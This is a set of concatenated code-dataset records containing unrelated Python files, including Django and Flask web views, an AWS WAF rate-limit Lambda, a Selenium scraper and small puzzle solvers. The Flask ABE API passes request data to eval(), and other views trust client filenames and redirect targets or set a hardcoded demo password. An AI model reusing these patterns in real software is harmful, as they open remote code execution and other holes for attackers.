imagesTab(request):\n return render_to_response('manager/images.html', locals(),\n context_instance=RequestContext(request))\n\n\ndef image_upload(request):\n cat = Type.objects.get(id=request.POST['category'])\n for image in request.FILES.getlist('images[]'):\n a = Artwork()\n a.filename = cat.apiAlias + '/' + str(image)\n a.title = 'Brez naslova'\n a.title_en = 'Untitled'\n a.category = cat\n handle_uploaded_file(image, cat.apiAlias)\n a.save()\n return True\n\n\ndef handle_uploaded_file(f, subdir):\n size = 128, 128\n import os\n\n name = str(f)\n p = settings.STATICFILES_DIRS[0]\n with open(p + 'images/content/gallery/' + subdir + '/' + str(f), 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n\n # make thumbnail\n im = Image.open(p + 'images/content/gallery/' + subdir + '/' + name)\n name, ext = os.path.splitext(name)\n im.thumbnail(size, Image.ANTIALIAS)\n ime = name + \"-thumb.jpg\"\n im.save(ime, \"JPEG\")\n if not (os.path.isdir(p + 'images/content/gallery/' + subdir + '/thumbs')):\n os.makedirs(p + 'images/content/gallery/' + subdir + '/thumbs')\n shutil.move(ime, p + 'images/content/gallery/' + subdir + '/thumbs')\n","sub_path":"Muhovic/manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"566179429","text":"import boto3\nimport os\nimport glob\nimport logging\nimport time\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass WafRateLimit:\n\n def __init__(self, resource_properties):\n self.rate = resource_properties['Rate']\n self.action = resource_properties['Action']\n self.region = resource_properties['Region']\n self.ip_set = resource_properties['IPSet']\n self.negated = resource_properties['Negated']\n self.region = resource_properties['Region']\n self.regional = resource_properties.get('Regional', 'false')\n self.web_acl_id = resource_properties['WebACLId']\n self.priority = int(resource_properties['Priority'])\n\n if 'EnvironmentName' in resource_properties:\n self.rule_name = f\"{resource_properties['EnvironmentName']}-rate-limit\"\n self.ip_set_name = f\"{resource_properties['EnvironmentName']}-rate-limit-ip-set\"\n else:\n self.rule_name = resource_properties['RuleName']\n self.ip_set_name = resource_properties['IpSetName']\n\n self.metric_name = self.rule_name.replace('-', '')\n\n if to_bool(self.regional):\n self.client = boto3.client('waf-regional', region_name=self.region)\n else:\n self.client = boto3.client('waf', region_name=self.region)\n\n def retry(func):\n # Reattempt to execute a given function with optional arguments.\n # This is to avoid the insane error about a token already being expired.\n def wrapper(self, *args, **kwargs):\n attempts = 5\n remaining = attempts\n\n while remaining:\n try:\n result = func(self, *args, **kwargs)\n return result\n except self.client.exceptions.WAFStaleDataException as e:\n logger.info(str(e))\n time.sleep(1)\n logger.info(\"(%d/%d) Retrying request with a new change token...\" % (remaining + 1, attempts))\n remaining -= 1\n\n logger.info(\"ERROR - failed to execute request.\")\n exit(1)\n\n return wrapper\n\n def _create_rate_based_rule(self):\n rule_id = self.create_rate_based_rule()\n\n if len(self.ip_set):\n ip_set_id = self.create_ip_set()\n self.update_ip_set('INSERT', ip_set_id, self.ip_set)\n self.update_rate_based_rule('INSERT', ip_set_id, rule_id)\n\n self._add_to_web_acl(rule_id)\n\n return rule_id\n\n @retry\n def create_rate_based_rule(self):\n change_token = self._get_change_token()\n logger.info(\"Creating WAF rule '%s' ...\" % self.rule_name)\n\n rule_id = self.client.create_rate_based_rule(\n Name=self.rule_name,\n MetricName=self.metric_name,\n RateLimit=int(self.rate),\n RateKey='IP',\n ChangeToken=change_token\n )['Rule']['RuleId']\n\n return rule_id\n\n @retry\n def create_ip_set(self):\n change_token = self._get_change_token()\n logger.info(\"Creating IP set '%s' ...\" % self.ip_set_name)\n\n ip_set_id = self.client.create_ip_set(\n Name=self.ip_set_name,\n ChangeToken=change_token\n )['IPSet']['IPSetId']\n\n return ip_set_id\n\n @retry\n def update_ip_set(self, action, ip_set_id, ip_set):\n change_token = self._get_change_token()\n logger.info(\"Updating IP set '%s' (%s) with %d IPs as %s ...\" % (self.ip_set_name, ip_set_id, len(self.ip_set), action))\n\n self.client.update_ip_set(\n IPSetId=ip_set_id,\n ChangeToken=change_token,\n Updates=generate_waf_ip_set(action, ip_set)\n )\n\n def _update_rate_based_rule(self, rule_id):\n self._delete_rate_based_rule(rule_id)\n return self._create_rate_based_rule()\n\n @retry\n def update_rate_based_rule(self, action, ip_set_id, rule_id):\n change_token = self._get_change_token()\n logger.info(\"Updating rule '%s' (%s) with IP set '%s' (%s) as %s ...\" % (self.rule_name, rule_id, self.ip_set_name, ip_set_id, action))\n\n self.client.update_rate_based_rule(\n RuleId=rule_id,\n ChangeToken=change_token,\n Updates=[{\n 'Action': action,\n 'Predicate': {\n 'Negated': to_bool(self.negated),\n 'Type': 'IPMatch',\n 'DataId': ip_set_id\n }\n }],\n RateLimit=int(self.rate)\n )\n\n def _delete_rate_based_rule(self, rule_id):\n logger.info(\"Getting IP set for rule '%s' (%s) ...\" % (self.rule_name, rule_id))\n\n try:\n predicates = self.client.get_rate_based_rule(\n RuleId=rule_id\n )['Rule']['MatchPredicates']\n except self.client.exceptions.WAFNonexistentItemException as e:\n logger.info(\"%s: rule ID '%s' does not exist. Returning success\" % (str(e), rule_id))\n return\n\n if len(predicates):\n ip_set_id = predicates[0]['DataId']\n\n logger.info(\"Getting IPs for IP set '%s' ...\" % (ip_set_id))\n\n current_ip_set = self.client.get_ip_set(\n IPSetId=ip_set_id\n )['IPSet']['IPSetDescriptors']\n\n if len(current_ip_set):\n self.update_ip_set('DELETE', ip_set_id, current_ip_set)\n\n self.update_rate_based_rule('DELETE', ip_set_id, rule_id)\n self.delete_ip_set(ip_set_id)\n\n self._delete_from_web_acl(rule_id)\n self.delete_rate_based_rule(rule_id)\n\n @retry\n def delete_ip_set(self, ip_set_id):\n change_token = self._get_change_token()\n logger.info(\"Deleting IP set '%s' ...\" % (ip_set_id))\n\n self.client.delete_ip_set(\n IPSetId=ip_set_id,\n ChangeToken=change_token\n )\n\n @retry\n def delete_rate_based_rule(self, rule_id):\n change_token = self._get_change_token()\n logger.info(\"Deleting rule '%s' (%s) ...\" % (self.rule_name, rule_id))\n\n self.client.delete_rate_based_rule(\n RuleId=rule_id,\n ChangeToken=change_token\n )\n\n def _get_change_token(self):\n token = self.client.get_change_token()['ChangeToken']\n logger.info(\"Got change token: %s\" % token)\n return token\n\n def _add_to_web_acl(self, rule_id):\n self._update_web_acl('INSERT', self.action, self.priority, rule_id)\n\n def _delete_from_web_acl(self, rule_id):\n # Get the current rule priority, as it is needed in the update request\n web_acl_rules = self.client.get_web_acl(\n WebACLId=self.web_acl_id\n )['WebACL']['Rules']\n\n current_rule = list(filter(lambda rule: rule['RuleId'] == rule_id, web_acl_rules))[0]\n current_action = current_rule['Action']['Type']\n current_priority = int(current_rule['Priority'])\n\n self._update_web_acl('DELETE', current_action, current_priority, rule_id)\n\n @retry\n def _update_web_acl(self, new_action, current_action, priority, rule_id):\n \"\"\"Add a rule ID with a web ACL.\n \"\"\"\n change_token = self._get_change_token()\n logger.info(\"%sing rule '%s' (%s) in web ACL ID '%s'\" % (new_action, self.rule_name, rule_id, self.web_acl_id))\n\n self.client.update_web_acl(\n WebACLId=self.web_acl_id,\n Updates=[{\n \"Action\": new_action,\n \"ActivatedRule\": {\n \"Action\": {\n \"Type\": current_action\n },\n \"Priority\": priority,\n \"RuleId\": rule_id,\n \"Type\": \"RATE_BASED\"\n }\n }],\n ChangeToken=change_token\n )\n\ndef generate_waf_ip_set(action, ips):\n return [{'Action': action, 'IPSetDescriptor': ip } for ip in ips]\n\ndef to_bool(value):\n return value.lower() == 'true'\n","sub_path":"lambdas/waf_rate_limit/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"300264142","text":"## hks9999\n## Windows\n## python 3.6.3\n\nimport os\nimport sys\nimport hashlib\nimport xlrd\nimport csv\n\nkeyword = {\"test\",\"okok\"}\n\ndef run(abspath,absdir):\n print(\"File :\",abspath)\n print(\"dir :\",absdir)\n\n wb = xlrd.open_workbook(abspath)\n sh = wb.sheet_by_index(0)\n your_csv_file = open('result.csv', 'a', encoding=\"utf-8\")\n wr = csv.writer(your_csv_file, quoting=csv.QUOTE_ALL)\n\n for rownum in range(sh.nrows):\n # 파일중에 내용이 있는지 비교하는 부분\n string = str(sh.row_values(rownum))\n for key_word in keyword:\n if(string.find(key_word) >= 0 ):\n print(string)\n wr.writerow(sh.row_values(rownum))\n break #일치하는 문자열이 없으면 더이상 검색하지 않음\n your_csv_file.close()\n\ndef filefind(dest):\n for root, dirs, files in os.walk(dest):\n for filename in files:\n relativepath = os.path.join(root,filename)\n abspath = os.path.abspath(relativepath)\n name,ext = os.path.splitext(filename)\n run(abspath,os.path.dirname(abspath))\n print()\n\nif __name__ == \"__main__\" :\n if(len(sys.argv)) != 2 :\n print(sys.argv[0],'\"\"')\n exit(0)\n if(os.path.isfile(sys.argv[1]) == True ):\n run(sys.argv[1])\n else:\n filefind(sys.argv[1])\n","sub_path":"xls_search.py","file_name":"xls_search.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"305272994","text":"import sys\n\ninput_file = open(\"max_path_sum3.data\", \"r\")\ntree=[]\nnum_levels = 0\nfor line in input_file:\n\tline = line.strip()\n\tnums_str = line.split(' ')\n\tfor num_str in nums_str:\n\t\ttree.append(int(num_str))\n\tnum_levels = num_levels + 1\n\ntree_sum = []\ntree_sum.extend(tree)\nprint(tree_sum)\n\nprint(\"levels = \", num_levels)\nnum_nodes = 0\n\nfor level in range(1, num_levels + 1):\n\tif level == 1:\n\t\tnum_nodes = num_nodes + level\n\t\tcontinue\n\tparent = num_nodes - (level-1)\n\ttwo_node_count = 0\n\ti = num_nodes\n\twhile i < num_nodes + level:\n\t\tnode_sum = tree[i] + tree_sum[parent]\n\t\t#print(\"node_sum = \", node_sum, \"i = \", i, \"parent =\", parent)\n\t\tif node_sum > tree_sum[i]:\n\t\t\ttree_sum[i] = node_sum\n\t\ttwo_node_count = two_node_count + 1\n\t\tif two_node_count == 2 and i < (num_nodes + level -1):\n\t\t\tparent = parent + 1\n\t\t\ti = i - 1\n\t\t\ttwo_node_count = 0\n\t\ti = i + 1\n\tnum_nodes = num_nodes + level\n\t\t\nprint(tree_sum)\nprint(\"Max is \", max(tree_sum))\n","sub_path":"max_path_sum1.py","file_name":"max_path_sum1.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"75701082","text":"import os\nimport secrets\nfrom datetime import datetime\nfrom PIL import Image\nfrom flask import render_template, url_for, flash, redirect, request, abort\nfrom flaskblog import app, db, bcrypt\nfrom flaskblog.forms import RegistrationForm, LoginForm, UpdateAccountForm, PostForm\nfrom flaskblog.models import User, Post\nfrom flask_login import login_user, current_user, logout_user, login_required\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n page = request.args.get('page', 1, type=int)\n posts = Post.query.order_by(Post.date_posted.desc()).paginate(page=page, per_page=5)\n return render_template('home.html', posts=posts)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(username=form.username.data, email=form.email.data, password=hashed_password,feed_period=form.feed_period.data,feed_amount=form.feed_amount.data)\n db.session.add(user)\n db.session.commit()\n flash('Your account has been created! You are now able to log in', 'success')\n return redirect(url_for('login')) #change it back to login\n elif request.method == 'GET':\n form.feed_amount.data = 25\n form.feed_period.data = 6\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash('Login Unsuccessful. Please check email and password', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(form_picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = os.path.join(app.root_path, 'static/profile_pics', picture_fn)\n\n output_size = (125, 125)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n i.save(picture_path)\n\n return picture_fn\n \n#takes picture and username and creates a default user\n#Input pictur should be opened using Image.open() from PIL Image\ndef default_profile(picture,username):\n # piccc=save_picture(picture)\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = os.path.join(app.root_path, 'static/profile_pics', picture_fn)\n output_size = (125, 125)\n picture.thumbnail(output_size)\n picture.save(picture_path)\n\n mail = username + '@demo.com'\n password='deneme'\n hashed_password = bcrypt.generate_password_hash(password).decode('utf-8')\n user=User(username=username,email=mail,password=hashed_password,image_file=picture_fn)\n db.session.add(user)\n db.session.commit()\n\n# Create feeding log for given cat\ndef postt(username):\n user=User.query.filter_by(username=username).first()\n content= str(user.feed_amount) + ' g of food given '\n title= user.username + \"'s feeding log\"\n post=Post(title=title,content=content,user_id=user.id)\n db.session.add(post)\n db.session.commit()\n \ndef is_feed_time(username):\n user=User.query.filter_by(username=username).first()\n\n p=Post.query.order_by(Post.date_posted.desc()).filter_by(user_id=user.id).first() \n z=p.date_posted\n a=datetime.utcnow()\n c=(a.month-z.month)*24*30+(a.day-z.day)*24+a.hour-z.hour #Will return total hour difference\n return c>user.feed_period \n\n \n@app.route(\"/account\", methods=['GET', 'POST'])\n@login_required\ndef account():\n form = UpdateAccountForm()\n if form.validate_on_submit():\n if form.picture.data:\n picture_file = save_picture(form.picture.data)\n current_user.image_file = picture_file\n current_user.username = form.username.data\n current_user.email = form.email.data\n current_user.feed_amount = form.feed_amount.data\n current_user.feed_period = form.feed_period.data\n db.session.commit()\n flash('Your account has been updated!', 'success')\n return redirect(url_for('account'))\n elif request.method == 'GET':\n form.username.data = current_user.username\n form.email.data = current_user.email\n form.feed_amount.data = current_user.feed_amount\n form.feed_period.data = current_user.feed_period\n image_file = url_for('static', filename='profile_pics/' + current_user.image_file)\n return render_template('account.html', title='Account',\n image_file=image_file, form=form)\n\n\n@app.route(\"/post/new\", methods=['GET', 'POST'])\n@login_required\ndef new_post():\n form = PostForm()\n if form.validate_on_submit():\n post = Post(title=form.title.data, content=form.content.data, author=current_user)\n db.session.add(post)\n db.session.commit()\n flash('Your post has been created!', 'success')\n return redirect(url_for('home'))\n# use this part while creating the functions for post creating\n elif request.method == 'GET':\n form.title.data = 'cat number' + str(current_user.id) + ' Feeding Log'\n form.content.data = str(current_user.feed_amount)+' g of food given'\n return render_template('create_post.html', title='New Post',\n form=form, legend='New Post')\n\n\n@app.route(\"/post/\")\ndef post(post_id):\n post = Post.query.get_or_404(post_id)\n return render_template('post.html', title=post.title, post=post)\n\n\n@app.route(\"/post//update\", methods=['GET', 'POST'])\n@login_required\ndef update_post(post_id):\n post = Post.query.get_or_404(post_id)\n if post.author != current_user:\n abort(403)\n form = PostForm()\n if form.validate_on_submit():\n post.title = form.title.data\n post.content = form.content.data\n db.session.commit()\n flash('Your post has been updated!', 'success')\n return redirect(url_for('post', post_id=post.id))\n elif request.method == 'GET':\n form.title.data = post.title\n form.content.data = post.content\n return render_template('create_post.html', title='Update Post',\n form=form, legend='Update Post')\n\n\n@app.route(\"/post//delete\", methods=['POST'])\n@login_required\ndef delete_post(post_id):\n post = Post.query.get_or_404(post_id)\n if post.author != current_user:\n abort(403)\n db.session.delete(post)\n db.session.commit()\n flash('Your post has been deleted!', 'success')\n return redirect(url_for('home'))\n\n\n@app.route(\"/user/\")\ndef user_posts(username):\n page = request.args.get('page', 1, type=int)\n user = User.query.filter_by(username=username).first_or_404()\n posts = Post.query.filter_by(author=user)\\\n .order_by(Post.date_posted.desc())\\\n .paginate(page=page, per_page=5)\n return render_template('user_posts.html', posts=posts, user=user)\n","sub_path":"flask_blog/flaskblog/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"173222480","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport datetime\nimport csv\nimport boto3\n\nTHIS_YEAR = datetime.date.today().year\nSTART_MONTH = 3\nEND_MONTH = 10\n\nBUCKET_NAME = 'npb-match-result'\nURL_TEMPLATE = 'http://npb.jp/games/{year}/schedule_{month}_detail.html'\nFILENAME_TEMPLATE = '{directory}/{year}_schedule.csv'\n\ndef lambda_handler(event, context):\n s3 = boto3.resource('s3')\n\n # headlessで動かすために必要なオプション\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n options.add_argument('--no-sandbox')\n options.add_argument('--single-process')\n # バイナリを指定\n options.binary_location = './bin/headless-chromium'\n\n # ブラウザの起動\n driver = webdriver.Chrome('./bin/chromedriver', chrome_options=options)\n\n scrape(driver, s3)\n\n driver.close()\n\ndef scrape(driver, s3):\n with open(FILENAME_TEMPLATE.format(directory='/tmp', year=THIS_YEAR), 'w') as f:\n writer = csv.writer(f)\n\n for month in range(START_MONTH, END_MONTH + 1):\n url = URL_TEMPLATE.format(year=THIS_YEAR, month=str(month).zfill(2))\n try:\n # ブラウザでアクセスする\n driver.get(url)\n\n # HTMLの文字コードをUTF-8に変換して取得する\n html = driver.page_source.encode('utf-8')\n soup = BeautifulSoup(html,'html.parser')\n\n for tr in soup.findAll('tr',id=re.compile('^date')):\n csv_row = []\n\n # 試合日を取得する\n if tr.find('th'):\n date = tr.find('th')\n\n for td in tr.findAll('td'):\n team1 = td.find('div', class_='team1')\n team2 = td.find('div', class_='team2')\n place = td.find('div', class_='place')\n time = td.find('div', class_='time')\n\n if team1 and team2:\n csv_row.append(str(THIS_YEAR) + '/' + date.string[:-3])\n csv_row.extend([team1.string, team2.string])\n if place and time:\n csv_row.extend([place.string, time.string])\n\n if csv_row and len(csv_row) == 5:\n writer.writerow(csv_row)\n\n print('success target={year}/{month}'\n .format(year=THIS_YEAR, month=str(month).zfill(2)))\n except Exception as e:\n print('error_message:{message}'.format(message=e))\n\n # S3へアップロード\n bucket = s3.Bucket(BUCKET_NAME)\n bucket.upload_file(FILENAME_TEMPLATE.format(directory='/tmp',year=THIS_YEAR),\n FILENAME_TEMPLATE.format(directory=THIS_YEAR,year=THIS_YEAR))\n\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"433483543","text":"from math import hypot\nfrom random import randint, choice\nPossiblePositions = [(i, j) for i in range(10) for j in range(10)]\n\n\ndef checkio(steps):\n global PossiblePositions\n # first move random\n if len(steps) == 1:\n PossiblePositions = [(i, j) for i in range(10) for j in range(10)]\n while 1:\n row = randint(0, 9)\n col = randint(0, 9)\n if [row, col] != steps[0][:2]:\n PossiblePositions.remove((steps[0][0], steps[0][1]))\n return [row, col]\n\n DistanceMap1 = {}\n for i in PossiblePositions:\n DistanceMap1[i] = hypot(i[0] - steps[-1][0], i[1] - steps[-1][1])\n DistanceMap2 = {}\n for i in PossiblePositions:\n DistanceMap2[i] = hypot(i[0] - steps[-2][0], i[1] - steps[-2][1])\n if steps[-1][-1] == 1:\n PossiblePositions = [i for i in PossiblePositions\n if DistanceMap1[i] < DistanceMap2[i]]\n elif steps[-1][-1] == -1:\n PossiblePositions = [i for i in PossiblePositions\n if DistanceMap1[i] > DistanceMap2[i]]\n else:\n PossiblePositions = [i for i in PossiblePositions\n if DistanceMap1[i] == DistanceMap2[i]]\n return choice(PossiblePositions)\n\n\nif __name__ == '__main__':\n # This part is using only for self-checking and not necessary for\n # auto-testing\n MAX_STEP = 12\n\n def check_solution(func, goal, start):\n prev_steps = [start]\n for step in range(MAX_STEP):\n row, col = func([s[:] for s in prev_steps])\n if [row, col] == goal:\n return True\n if 10 <= row or 0 > row or 10 <= col or 0 > col:\n print(\"You gave wrong coordinates.\")\n return False\n prev_distance = hypot(\n prev_steps[-1][0] - goal[0], prev_steps[-1][1] - goal[1])\n distance = hypot(row - goal[0], col - goal[1])\n alteration = 0 if prev_distance == distance else (\n 1 if prev_distance > distance else -1)\n prev_steps.append([row, col, alteration])\n print(\"Too many steps\")\n return False\n\n assert check_solution(checkio, [7, 7], [5, 5, 0]), \"1st example\"\n assert check_solution(checkio, [5, 6], [0, 0, 0]), \"2nd example\"\n","sub_path":"Colder-Warmer.py","file_name":"Colder-Warmer.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"70986092","text":"'''THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE AND\nNON-INFRINGEMENT. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR ANYONE\nDISTRIBUTING THE SOFTWARE BE LIABLE FOR ANY DAMAGES OR OTHER LIABILITY,\nWHETHER IN CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.'''\n\n# Bitcoin Cash (BCH) qpz32c4lg7x7lnk9jg6qg7s4uavdce89myax5v5nuk\n# Ether (ETH) - 0x843d3DEC2A4705BD4f45F674F641cE2D0022c9FB\n# Litecoin (LTC) - Lfk5y4F7KZa9oRxpazETwjQnHszEPvqPvu\n# Bitcoin (BTC) - 34L8qWiQyKr8k4TnHDacfjbaSqQASbBtTd\n\n# contact :- github@jamessawyer.co.uk\n\n\n\n\"\"\"\nCounting Summations\nProblem 76\n\nIt is possible to write five as a sum in exactly six different ways:\n\n4 + 1\n3 + 2\n3 + 1 + 1\n2 + 2 + 1\n2 + 1 + 1 + 1\n1 + 1 + 1 + 1 + 1\n\nHow many different ways can one hundred be written as a sum of at least two\npositive integers?\n\"\"\"\n\n\ndef partition(m):\n \"\"\"Returns the number of different ways one hundred can be written as a sum\n of at least two positive integers.\n\n >>> partition(100)\n 190569291\n >>> partition(50)\n 204225\n >>> partition(30)\n 5603\n >>> partition(10)\n 41\n >>> partition(5)\n 6\n >>> partition(3)\n 2\n >>> partition(2)\n 1\n >>> partition(1)\n 0\n \"\"\"\n memo = [[0 for _ in range(m)] for _ in range(m + 1)]\n for i in range(m + 1):\n memo[i][0] = 1\n\n for n in range(m + 1):\n for k in range(1, m):\n memo[n][k] += memo[n][k - 1]\n if n > k:\n memo[n][k] += memo[n - k - 1][k]\n\n return memo[m][m - 1] - 1\n\n\nif __name__ == \"__main__\":\n print(partition(int(str(input()).strip())))\n","sub_path":"project_euler/problem_76/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"580417047","text":"from flask import g, jsonify, request, url_for\nfrom .models import User\nfrom . import main\nfrom app.ABE.ABE_TS import keygen, getGroup, predecrypt, dictToObject\nfrom app.ABE.models import getPK_dict\nfrom app.ABE.models import getMSK_dict, getPK_dict\nfrom flask_httpauth import HTTPBasicAuth\nfrom app.ABE.models import Attribute\nfrom app import db\nfrom app.OSS.STSToken import generateDownloadAccessKey, generateUploadAccessKey, retrieveData\n\nauth = HTTPBasicAuth()\n\n@auth.verify_password\ndef verify_password(username, password):\n user = User.query.filter_by(username=username).first()\n if not user:\n return False\n g.current_user = user\n return user.verify_password(password)\n\n@main.route('/profile/', methods=['PUT'])\n@auth.login_required\ndef modifyProfile(username):\n user = User.query.filter_by(username=username).first()\n if g.current_user == user or g.current_user == User.query.filter_by(username=='admin').first():\n try:\n if request.json.get('username'):\n user.username = request.json.get('username')\n if request.json.get('password'):\n user.password = request.json.get('password')\n if request.json.get('role'):\n user.role = request.json.get('role')\n attributes = None\n if request.json.get('attributes'):\n attributes = request.json.get('attributes') # format should be: 'ONE, TWO, THREE'\n attributes = attributes.split(',')\n except:\n return \"incomplete information or illegal attributes format. \\n\\nexample:\\nusename: Fry\\npassword: yrF\\nrole: user\\nattributes: ONE, TWO, THREE\"\n try:\n user.attributes = []\n if attributes:\n for eachAttribute in attributes:\n attribute = Attribute.query.filter_by(description=eachAttribute).first()\n if not attribute:\n attribute = Attribute()\n attribute.description = eachAttribute\n db.session.add(attribute)\n user.attributes.append(attribute)\n db.session.add(user)\n db.session.commit()\n except:\n return 'database error.'\n return 'user modification success.'\n return 'you cannot modify other peoples profile.'\n\n@main.route('/profile//keygen')\n@auth.login_required\ndef getSK(username):\n user = User.query.filter_by(username=username).first()\n if g.current_user != user:\n return 'you can not get other peoples ABE secret key.'\n attributes = user.attributes\n attributes_list = []\n if attributes is None:\n return 'no attribute provided.'\n for each in attributes:\n attributes_list.append(each.description)\n\n group = getGroup()\n pk_dict = getPK_dict(); pk = dictToObject(pk_dict=pk_dict, group=group)\n msk_dict = getMSK_dict(); msk = dictToObject(msk_dict=msk_dict, group=group)\n keys = keygen(pk=pk, msk=msk, S=attributes_list)\n return jsonify(keys)\n\n@main.route('/profile/', methods=['DELETE'])\n@auth.login_required\ndef deleteUser(username):\n if g.current_user is not User.query.filter_by(username='admin').first():\n return 'admin login required.'\n from app import db\n user = User.query.filter_by(username=username).first()\n if not user:\n return 'user not exist.'\n try:\n db.session.delete(user)\n except:\n return 'delete error.'\n db.session.commit()\n return 'user deletion success.'\n\n@main.route('/attribute', methods=['DELETE'])\n@auth.login_required\ndef deleteAttribute():\n if g.current_user is not User.query.filter_by(username='admin').first():\n return 'admin login required.'\n from app import db\n from app.ABE.models import Attribute\n attr = Attribute.query.filter_by(description=request.json.get('description')).first()\n if not attr:\n return 'attribute not exist.'\n try:\n db.session.delete(attr)\n except:\n return 'delete error.'\n db.session.commit()\n return 'attribute deletion success.'\n\n@main.route('/profile//predec', methods=['POST'])\n@auth.login_required\ndef predec(username):\n try:\n ik_dict = eval(request.json.get('ik'))\n except:\n return 'no ik or incorrect ik format. get ik by Keygen api'\n ct_stream = retrieveData(username)\n\n pk_dict=getPK_dict(); ct_dict = eval(ct_stream.read()); group = getGroup()\n IM = predecrypt(pk=dictToObject(pk_dict=pk_dict, group=group),\n ik=dictToObject(ik_dict=ik_dict, group=group),\n ct=dictToObject(ct_dict=ct_dict, group=group))\n\n return jsonify({'IM':IM})\n\n@main.route('/uploadtoken')\n@auth.login_required\ndef getUploadToken():\n username = g.current_user.username\n from app.OSS.STSToken import generateUploadAccessKey\n return jsonify(generateUploadAccessKey(username))\n\n@main.route('/downloadtoken')\n@auth.login_required\ndef getDownloadToken():\n username = g.current_user.username\n from app.OSS.STSToken import generateDownloadAccessKey\n return jsonify(generateDownloadAccessKey(username))","sub_path":"app/main/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"179173351","text":"import pandas as pd\n\n\"\"\"\nthe most important part is the DataFrame\n\"\"\"\nreader = pd.read_csv(\"./Prostate_Cancer.csv\")\n\n# print(reader.values[:, 3:4].sum())\n# print(reader.columns)\n# print(reader.values[:, 3:4].min())\n\ndf = pd.DataFrame([[1, 2, 3, 4], [2, 2, 2, 2], [3, 3, 3, 3]], columns=[\"col1\", \"col2\", \"col3\", \"col4\"])\n\n# print(df)\n\"\"\"\ndf.mean()默认计算矩阵每列的均值,\n\"\"\"\n\n\"\"\"\naxis = 0 为横轴(缺省),沿着行垂直向下,axis = 1 为纵轴,沿着横轴向右\n\n\n\"\"\"\n# df = df.drop(\"col2\", axis=1)\n# print(df)\n\n# features = [i for i in reader.columns]\n# print(type(features))\n# l = [i for i in features]\n# print(l)\n\n\"\"\"\npandas: df.loc[1:2]\nnumpy: arr[1:2]\n\"\"\"\nprint(df.iloc[:1, 1:])\n\na = [11.1,11.2,11.3]\nprint(a.index(min(a)))","sub_path":"learn_pandas/explore_data.py","file_name":"explore_data.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}